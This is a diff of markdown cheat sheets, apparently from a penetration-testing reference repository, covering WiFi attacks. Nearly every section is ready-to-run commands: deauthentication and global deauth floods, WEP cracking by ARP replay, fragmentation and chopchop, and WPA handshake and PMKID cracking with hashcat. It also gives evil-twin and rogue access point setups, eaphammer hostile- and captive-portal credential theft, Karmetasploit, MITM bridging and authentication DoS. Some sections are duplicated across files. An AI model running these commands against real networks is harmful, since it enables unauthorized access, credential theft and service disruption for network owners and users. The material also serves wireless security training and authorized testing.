> wifi.deauth e0:xx:xx:xx:xx:xx
|
|
||||||
/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx
|
|
||||||
/path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'
|
|
||||||
```
|
|
||||||
|
|
||||||
**Bettercap WPA - PMKID attack**
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
wifi.assoc all
|
|
||||||
/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap
|
|
||||||
/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'
|
|
||||||
```
|
|
||||||
|
|
||||||
### Additional Aircrack-NG Tools
|
|
||||||
|
|
||||||
#### Remove Wireless Headers
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airdecap-ng -b $AP_MAC open-network.cap
|
|
||||||
* -dec.cap: stripped version of the file
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Decrypt a WEP encrypted capture file
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airdecap-ng -w $WEP_KEY wep.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Decrypt a WPA2 encrypted capture file
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Remote Aircrack Suite
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
airserv-ng -p 1337 -c 3 -d mon0
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Wireless Intrusion Detection System
|
|
||||||
|
|
||||||
> Require wireless key and bssid
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
|
|
||||||
# create the at0 interface
|
|
||||||
airtun-ng -a $AP_MAC -w $WEP_KEY mon0
|
|
||||||
# the interface will auto decrypt packets
|
|
||||||
```
|
|
||||||
|
|
||||||
### Wireless Reconnaissance
|
|
||||||
|
|
||||||
> Use CSV file from airodump
|
|
||||||
|
|
||||||
CAPR Graph
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png
|
|
||||||
# color
|
|
||||||
- green: wpa
|
|
||||||
- yellow: wep
|
|
||||||
- red: open
|
|
||||||
- black: unknown
|
|
||||||
```
|
|
||||||
|
|
||||||
CPG - Client Probe Graph
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png
|
|
||||||
```
|
|
||||||
|
|
||||||
### Kismet
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
kismet
|
|
||||||
[enter][enter]
|
|
||||||
[tab][close]
|
|
||||||
|
|
||||||
# Select a source and begin a monitoring
|
|
||||||
Kismet > Add source > wlan0 > Add
|
|
||||||
|
|
||||||
.nettxt: data
|
|
||||||
.pcapdump: wireshark format
|
|
||||||
```
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# giskismet: kismet inside a SQL database
|
|
||||||
> require a GPS receiver
|
|
||||||
|
|
||||||
gpsd -n -N -D4 /dev/ttyUSB0
|
|
||||||
-N : foreground
|
|
||||||
-D : debugging level
|
|
||||||
|
|
||||||
# kismet will gather SSID and GPS location
|
|
||||||
giskismet -x kismet.netxml
|
|
||||||
|
|
||||||
# generate a kml file (Google Earth)
|
|
||||||
giskismet -q "select * from wireless" -o allaps.kml
|
|
||||||
giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml
|
|
||||||
```
|
|
||||||
|
|
||||||
### Rogue Access Point
|
|
||||||
|
|
||||||
#### WPA handshake
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
airodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0
|
|
||||||
|
|
||||||
# basic fake AP
|
|
||||||
airbase-ng -c 3 -e $AP_SSID mon0
|
|
||||||
airbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0
|
|
||||||
-W 1 : WEP
|
|
||||||
|
|
||||||
# get a WPA handshake if the client connect
|
|
||||||
aircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Karmetasploit
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# install a dhcp server
|
|
||||||
apt install dhcp3-server
|
|
||||||
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
airbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0
|
|
||||||
-P: respond to all probes
|
|
||||||
ifconfig at0 up 10.0.0.1/24
|
|
||||||
|
|
||||||
mkdir -p /var/run/dhcpd
|
|
||||||
chown -R dhcpd:dhcpd /var/run/dhcpd
|
|
||||||
touch /var/lib/dhcp3/dhcpd.leases
|
|
||||||
|
|
||||||
"CONF DHCP FROM VIDEO 75" > /tmp/dhcpd.conf
|
|
||||||
|
|
||||||
touch /tmp/dhcp.log
|
|
||||||
chown -R dhcpd:dhcpd /tmp/dhcp.log
|
|
||||||
dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0
|
|
||||||
|
|
||||||
karma.rc from metasploit
|
|
||||||
# comment the first 2 lines (load sqlite)
|
|
||||||
msfconsole -r /root/karma.rc
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Access Point MITM
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
airbase-ng -c 3 -e $AP_SSID_SPOOFED mon0
|
|
||||||
|
|
||||||
# create a bridged interface
|
|
||||||
# apt-get install bridge-utils
|
|
||||||
brctl addbr hacker
|
|
||||||
brctl addif hacker eth0
|
|
||||||
brctl addif hacker at0
|
|
||||||
|
|
||||||
# assign IP addresses
|
|
||||||
ifconfig eth0 0.0.0.0 up
|
|
||||||
ifconfig at0 0.0.0.0 up
|
|
||||||
ifconfig hacker 192.168.1.8 up
|
|
||||||
|
|
||||||
# enable IP forwarding
|
|
||||||
echo 1 > /proc/sys/net/ipv4/ip_forward
|
|
||||||
|
|
||||||
# mitm tools
|
|
||||||
driftnet
|
|
||||||
ettercap -G
|
|
||||||
Sniff > Unified sniffing > Hacker Interface
|
|
||||||
```
|
|
||||||
|
|
||||||
### Other things
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# Find Hidden SSID
|
|
||||||
aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0
|
|
||||||
|
|
||||||
# Mac Filtering
|
|
||||||
macchanger –-mac <VictimMac> wlan0mon
|
|
||||||
aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
|
|
||||||
# MAC CHANGER
|
|
||||||
ifconfig wlan0mon down
|
|
||||||
macchanger –-mac <macVictima> wlan0mon
|
|
||||||
ifconfig wlan0mon up
|
|
||||||
|
|
||||||
# Deauth Global
|
|
||||||
aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon
|
|
||||||
|
|
||||||
# Authentication DoS Mode
|
|
||||||
mdk3 wlan0mon a -a $AP_MAC
|
|
||||||
|
|
||||||
# Tshark - Filter and dislay data
|
|
||||||
tshark -r Captura-02.cap -Y "eapol" 2>/dev/null
|
|
||||||
tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null
|
|
||||||
tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null
|
|
||||||
|
|
||||||
# Convert .cap with handshake to .hccap
|
|
||||||
aircrack-ng -J network network.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
### References
|
|
||||||
|
|
||||||
* [Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]](https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/)
|
|
||||||
* [Aireplay 0841 Attack – Introduction](https://www.doyler.net/security-not-included/aireplay-0841-attack)
|
|
||||||
* [Preparación para el OSWP (by s4vitar)](https://gist.github.com/s4vitar/3b42532d7d78bafc824fb28a95c8a5eb)
|
|
|
@ -0,0 +1,142 @@
|
||||||
|
# Wifi - Basics
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [aircrack-ng/aircrack-ng](https://github.com/aircrack-ng/aircrack-ng) - WiFi security auditing tools suite
|
||||||
|
* [kimocoder/wifite2](https://github.com/kimocoder/wifite2) - Rewrite of the popular wireless network auditor, "wifite" - original by @derv82
|
||||||
|
* [derv82/wifite2](https://github.com/derv82/wifite2) - Rewrite of the popular wireless network auditor, "wifite"
|
||||||
|
* [derv82/wifite](https://github.com/derv82/wifite) - Wifite is an automated wireless attack tool.
|
||||||
|
|
||||||
|
|
||||||
|
## Linux Wireless Basics
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
AP_MAC="XX:XX:XX:XX:XX" # BSSID
|
||||||
|
VICTIM_MAC="XX:XX:XX:XX:XX" # VIC
|
||||||
|
ATTACKER_MAC="XX:XX:XX:XX:XX" # MON
|
||||||
|
AP_SSID="wifibox" # ESSID
|
||||||
|
SRC_ADDR="192.168.1.1"
|
||||||
|
DST_ADDR="192.168.1.255"
|
||||||
|
```
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# driver install
|
||||||
|
apt install realtek-rtl88xxau-dkms
|
||||||
|
|
||||||
|
# network card recon
|
||||||
|
iwconfig
|
||||||
|
iw list
|
||||||
|
dmesg | grep 8187 # alfa card
|
||||||
|
|
||||||
|
# Increase Wi-Fi TX Power
|
||||||
|
iw reg set B0
|
||||||
|
iwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)
|
||||||
|
|
||||||
|
# find SSID and channel
|
||||||
|
iw dev wlan0 scan | grep SSID
|
||||||
|
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
|
||||||
|
iwlist wlan0 scanning | egrep "ESSID|Channel"
|
||||||
|
|
||||||
|
# monitor mode - start
|
||||||
|
airmon-ng start wlan0
|
||||||
|
airmon-ng start wlan0 3 # only on a particular channel e.g: 3
|
||||||
|
* Manual 1: iw dev wlan0 interface add mon0 type monitor
|
||||||
|
* Manual 2: iwconfig wlan0 mode monitor channel 3
|
||||||
|
ifconfig mon0 up
|
||||||
|
# monitor mode - stop
|
||||||
|
airmon-ng stop mon0
|
||||||
|
* Manual 1: iw dev wlan0 interface del mon0
|
||||||
|
* Manual 2: iwconfig wlan0 mode managed
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Aircrack-ng Essentials
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# check and kill processes that could interfere with our monitor mode
|
||||||
|
airmon-ng check
|
||||||
|
airmon-ng check kill
|
||||||
|
# pkill dhclient; pkill wpa_supplicant; pkill dhclient3
|
||||||
|
|
||||||
|
# list AP
|
||||||
|
airodump-ng mon0
|
||||||
|
airodump-ng mon0 -c 3 # only on a particular channel e.g: 3
|
||||||
|
airodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic
|
||||||
|
|
||||||
|
# get our macaddress
|
||||||
|
macchanger -s mon0
|
||||||
|
macchanger --show mon0
|
||||||
|
|
||||||
|
# replay and accelerate traffic
|
||||||
|
aireplay-ng
|
||||||
|
* -i interface
|
||||||
|
* -r file.pcap
|
||||||
|
|
||||||
|
# check aireplay card compatibility
|
||||||
|
aireplay-ng -9 mon0 -> test injection
|
||||||
|
aireplay-ng -9 -i wlan1 mon0 -> test card to card injection
|
||||||
|
|
||||||
|
# injection rate
|
||||||
|
iwconfig wlan0 rate 1M
|
||||||
|
|
||||||
|
# Aircrack compatibility
|
||||||
|
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters
|
||||||
|
Alfa AWUS036H / TPLink WN722
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Fake authentication attack
|
||||||
|
|
||||||
|
:warning: use it before each attack
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0
|
||||||
|
|
||||||
|
# fake authentication = no arp
|
||||||
|
aireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
* Might need a real $ATTACKER_MAC, observe traffic using airodump
|
||||||
|
> Association successful! :-)
|
||||||
|
|
||||||
|
# fake authentication for picky AP
|
||||||
|
# Send keep-alive packets every 10 seconds
|
||||||
|
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
|
||||||
|
|
||||||
|
# might need to fake your MAC ADDRESS first
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Deauthentication attack
|
||||||
|
|
||||||
|
> Force ARP packet to be sent.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
* -0 : 1 deauthentication, 0 unlimited
|
||||||
|
> Sending 64 directed DeAuth.
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### ARP Replay Attack
|
||||||
|
|
||||||
|
Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
* ATTACKER_MAC if fake authentication launched
|
||||||
|
* CONNECTED_MAC if a client is associated
|
||||||
|
|
||||||
|
# –x 1000 –n 1000 ?
|
||||||
|
# aireplay-ng -3 –x 1000 –n 1000 –b $AP_MAC -h $ATTACKER_MAC wlan0mon
|
||||||
|
# wait for ARP on the network
|
||||||
|
# alternatively you can de-auth some clients
|
||||||
|
|
||||||
|
aircrack-ng –b <BSSID> <PCAP_of_FileName>
|
||||||
|
aircrack-ng -0 wep1.cap
|
||||||
|
* -0 : colored output
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]](https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/)
|
||||||
|
* [Aireplay 0841 Attack – Introduction](https://www.doyler.net/security-not-included/aireplay-0841-attack)
|
|
@ -0,0 +1,112 @@
|
||||||
|
# Wifi - Enterprise Network
|
||||||
|
|
||||||
|
## WPA and WPA2 EAP
|
||||||
|
|
||||||
|
WPA EAP refers to the use of the Extensible Authentication Protocol (EAP) within the context of the Wi-Fi Protected Access (WPA) security standard for wireless networks. WPA is a suite of security protocols to secure wireless local area networks (WLANs) and is a response to the vulnerabilities of the older Wired Equivalent Privacy (WEP) standard. WPA EAP is specifically associated with the enterprise mode of WPA, which uses 802.1X authentication to provide a higher level of security compared to the personal mode of WPA, which uses a pre-shared key (PSK).
|
||||||
|
|
||||||
|
|
||||||
|
* [s0lst1c3/eaphammer](https://github.com/s0lst1c3/eaphammer) - Targeted evil twin attacks against WPA2-Enterprise networks.
|
||||||
|
```ps1
|
||||||
|
git clone https://github.com/s0lst1c3/eaphammer.git
|
||||||
|
./kali-setup
|
||||||
|
|
||||||
|
# generate certificates
|
||||||
|
./eaphammer --cert-wizard
|
||||||
|
|
||||||
|
# launch attack
|
||||||
|
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
|
||||||
|
```
|
||||||
|
|
||||||
|
* [Stealing RADIUS Credentials Using EAPHammer](https://github.com/s0lst1c3/eaphammer/wiki/II.-Stealing-RADIUS-Credentials-Using-EAPHammer)
|
||||||
|
```ps1
|
||||||
|
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth wpa-eap --creds
|
||||||
|
```
|
||||||
|
|
||||||
|
* [Stealing AD Credentials Using Hostile Portal Attacks](https://github.com/s0lst1c3/eaphammer/wiki/III.-Stealing-AD-Credentials-Using-Hostile-Portal-Attacks)
|
||||||
|
```ps1
|
||||||
|
./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth wpa-eap --hostile-portal
|
||||||
|
./eaphammer --interface wlan0 --essid TotallyLegit --hw-mode n --channel 36 --auth open --hostile-portal
|
||||||
|
```
|
||||||
|
|
||||||
|
* [Performing Captive Portal Attacks - Evil Twin Attacks](https://github.com/s0lst1c3/eaphammer/wiki/V.-Performing-Captive-Portal-Attacks)
|
||||||
|
```ps1
|
||||||
|
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid HappyMealz --channel 149 --interface wlan0 --captive-portal
|
||||||
|
./eaphammer --captive-portal -e guestnet -i wlan0 --portal-template rogue-cert-prompt --lhost 10.0.0.10 --payload secure.crt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Rogue Access Point
|
||||||
|
|
||||||
|
### WPA handshake
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
airodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0
|
||||||
|
|
||||||
|
# basic fake AP
|
||||||
|
airbase-ng -c 3 -e $AP_SSID mon0
|
||||||
|
airbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0
|
||||||
|
-W 1 : WEP
|
||||||
|
|
||||||
|
# get a WPA handshake if the client connect
|
||||||
|
aircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Karmetasploit
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# install a dhcp server
|
||||||
|
apt install dhcp3-server
|
||||||
|
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
airbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0
|
||||||
|
-P: respond to all probes
|
||||||
|
ifconfig at0 up 10.0.0.1/24
|
||||||
|
|
||||||
|
mkdir -p /var/run/dhcpd
|
||||||
|
chown -R dhcpd:dhcpd /var/run/dhcpd
|
||||||
|
touch /var/lib/dhcp3/dhcpd.leases
|
||||||
|
|
||||||
|
"CONF DHCP FROM VIDEO 75" > /tmp/dhcpd.conf
|
||||||
|
|
||||||
|
touch /tmp/dhcp.log
|
||||||
|
chown -R dhcpd:dhcpd /tmp/dhcp.log
|
||||||
|
dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0
|
||||||
|
|
||||||
|
karma.rc from metasploit
|
||||||
|
# comment the first 2 lines (load sqlite)
|
||||||
|
msfconsole -r /root/karma.rc
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Access Point MITM
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
airbase-ng -c 3 -e $AP_SSID_SPOOFED mon0
|
||||||
|
|
||||||
|
# create a bridged interface
|
||||||
|
# apt-get install bridge-utils
|
||||||
|
brctl addbr hacker
|
||||||
|
brctl addif hacker eth0
|
||||||
|
brctl addif hacker at0
|
||||||
|
|
||||||
|
# assign IP addresses
|
||||||
|
ifconfig eth0 0.0.0.0 up
|
||||||
|
ifconfig at0 0.0.0.0 up
|
||||||
|
ifconfig hacker 192.168.1.8 up
|
||||||
|
|
||||||
|
# enable IP forwarding
|
||||||
|
echo 1 > /proc/sys/net/ipv4/ip_forward
|
||||||
|
|
||||||
|
# mitm tools
|
||||||
|
driftnet
|
||||||
|
ettercap -G
|
||||||
|
Sniff > Unified sniffing > Hacker Interface
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [TODO](#)
|
|
@ -0,0 +1,122 @@
|
||||||
|
# Wifi - Additional Tricks and Tools
|
||||||
|
|
||||||
|
## Additional Aircrack-NG Tools
|
||||||
|
|
||||||
|
### Remove Wireless Headers
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airdecap-ng -b $AP_MAC open-network.cap
|
||||||
|
* -dec.cap: stripped version of the file
|
||||||
|
```
|
||||||
|
|
||||||
|
### Decrypt a WEP encrypted capture file
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airdecap-ng -w $WEP_KEY wep.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
### Decrypt a WPA2 encrypted capture file
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
### Remote Aircrack Suite
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
airserv-ng -p 1337 -c 3 -d mon0
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT
|
||||||
|
```
|
||||||
|
|
||||||
|
### Wireless Intrusion Detection System
|
||||||
|
|
||||||
|
> Require wireless key and bssid
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
|
||||||
|
# create the at0 interface
|
||||||
|
airtun-ng -a $AP_MAC -w $WEP_KEY mon0
|
||||||
|
# the interface will auto decrypt packets
|
||||||
|
```
|
||||||
|
|
||||||
|
## Wireless Reconnaissance
|
||||||
|
|
||||||
|
> Use CSV file from airodump
|
||||||
|
|
||||||
|
CAPR Graph
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png
|
||||||
|
# color
|
||||||
|
- green: wpa
|
||||||
|
- yellow: wep
|
||||||
|
- red: open
|
||||||
|
- black: unknown
|
||||||
|
```
|
||||||
|
|
||||||
|
CPG - Client Probe Graph
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png
|
||||||
|
```
|
||||||
|
|
||||||
|
## Kismet
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
kismet
|
||||||
|
[enter][enter]
|
||||||
|
[tab][close]
|
||||||
|
|
||||||
|
# Select a source and begin a monitoring
|
||||||
|
Kismet > Add source > wlan0 > Add
|
||||||
|
|
||||||
|
.nettxt: data
|
||||||
|
.pcapdump: wireshark format
|
||||||
|
```
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# giskismet: kismet inside a SQL database
|
||||||
|
> require a GPS receiver
|
||||||
|
|
||||||
|
gpsd -n -N -D4 /dev/ttyUSB0
|
||||||
|
-N : foreground
|
||||||
|
-D : debugging level
|
||||||
|
|
||||||
|
# kismet will gather SSID and GPS location
|
||||||
|
giskismet -x kismet.netxml
|
||||||
|
|
||||||
|
# generate a kml file (Google Earth)
|
||||||
|
giskismet -q "select * from wireless" -o allaps.kml
|
||||||
|
giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml
|
||||||
|
```
|
||||||
|
|
||||||
|
## Other things
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Find Hidden SSID
|
||||||
|
aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0
|
||||||
|
|
||||||
|
# Mac Filtering
|
||||||
|
macchanger –-mac <VictimMac> wlan0mon
|
||||||
|
aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
|
||||||
|
# MAC CHANGER
|
||||||
|
ifconfig wlan0mon down
|
||||||
|
macchanger –-mac <macVictima> wlan0mon
|
||||||
|
ifconfig wlan0mon up
|
||||||
|
|
||||||
|
# Deauth Global
|
||||||
|
aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon
|
||||||
|
|
||||||
|
# Authentication DoS Mode
|
||||||
|
mdk3 wlan0mon a -a $AP_MAC
|
||||||
|
|
||||||
|
# Tshark - Filter and dislay data
|
||||||
|
tshark -r Captura-02.cap -Y "eapol" 2>/dev/null
|
||||||
|
tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null
|
||||||
|
tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null
|
||||||
|
|
||||||
|
# Convert .cap with handshake to .hccap
|
||||||
|
aircrack-ng -J network network.cap
|
||||||
|
```
|
|
@ -0,0 +1,175 @@
|
||||||
|
# Wifi - WEP Cracking
|
||||||
|
|
||||||
|
## Cracking WEP with a Client
|
||||||
|
|
||||||
|
### ARP Request Replay Attack
|
||||||
|
|
||||||
|
> Attack the ACCESS POINT
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic
|
||||||
|
|
||||||
|
# Fake authentication for a more reliable attack
|
||||||
|
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# ARP replay attack
|
||||||
|
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# Deauthentication
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# Cracking
|
||||||
|
aircrack-ng arpreplay.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Interactive replay attack
|
||||||
|
|
||||||
|
> Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic
|
||||||
|
|
||||||
|
# fake authentication for a more reliable attack
|
||||||
|
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# interactive replay attack (min arp 68, max arp 86)
|
||||||
|
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet
|
||||||
|
aireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet
|
||||||
|
# Packet selection (ARP packets met the characteristics):
|
||||||
|
# - APs will always repeat packets destined to the broadcast
|
||||||
|
# - The packet will have the ToDS (To Distribution System) bit set to 1
|
||||||
|
# answer "y" multiple times
|
||||||
|
|
||||||
|
# cracking require ~> 250000 IVs
|
||||||
|
aircrack-ng -0 -z -n 64 clientwep-01.cap
|
||||||
|
* -z: PTW attack
|
||||||
|
* -n: number of bits in the WEP key
|
||||||
|
|
||||||
|
# backup file with an ARP packet
|
||||||
|
aireplay-ng -2 -r replay.cap mon0
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Cracking WEP without a Client
|
||||||
|
|
||||||
|
* Chopchop & Fragmentation attack => PRGA, generate more packets with weak IVs
|
||||||
|
* Need an AP configured with open system authentication
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client
|
||||||
|
|
||||||
|
# fake authentication attack with association timing (every 60s try to reassociate)
|
||||||
|
aireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump
|
||||||
|
# -1 6000 to avoid a time out.
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Fragmentation attack
|
||||||
|
|
||||||
|
> Goal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# attacker mac must be associated (fake auth)
|
||||||
|
# Press "Y"
|
||||||
|
aireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# use our PRGA from the fragmentation attack to generate an ARP request
|
||||||
|
# SRC_ADDR: 192.168.1.100
|
||||||
|
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
|
||||||
|
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap
|
||||||
|
# -k: the destination IP i.e. in ARP, this is "Who has this IP"
|
||||||
|
# -l: the source IP i.e. in ARP, this is "Tell this IP"
|
||||||
|
|
||||||
|
# check the packet
|
||||||
|
tcpdump -n -vvv -e -s0 -r inject.cap
|
||||||
|
|
||||||
|
# inject our crafted packet
|
||||||
|
aireplay-ng -2 -r inject.cap mon0
|
||||||
|
|
||||||
|
# crack the WEP key
|
||||||
|
# Aircrack-ng will auto-update when new IVs are available
|
||||||
|
aircrack-ng -0 wepcrack
|
||||||
|
|
||||||
|
# if 64-bit WEP is used, cracking time < 5 minutes
|
||||||
|
# switch to 128-bit keys after 600000 IVs
|
||||||
|
# use the `-f 4` after 2000000
|
||||||
|
aircrack-ng -n 64 <capture filename>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### KoreK Chopchop attack
|
||||||
|
|
||||||
|
> Can't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# chopchop attack: -4
|
||||||
|
# out decrypted: .cap
|
||||||
|
# out prga: .xor
|
||||||
|
# Press "Y" (choose a small packet)
|
||||||
|
aireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0
|
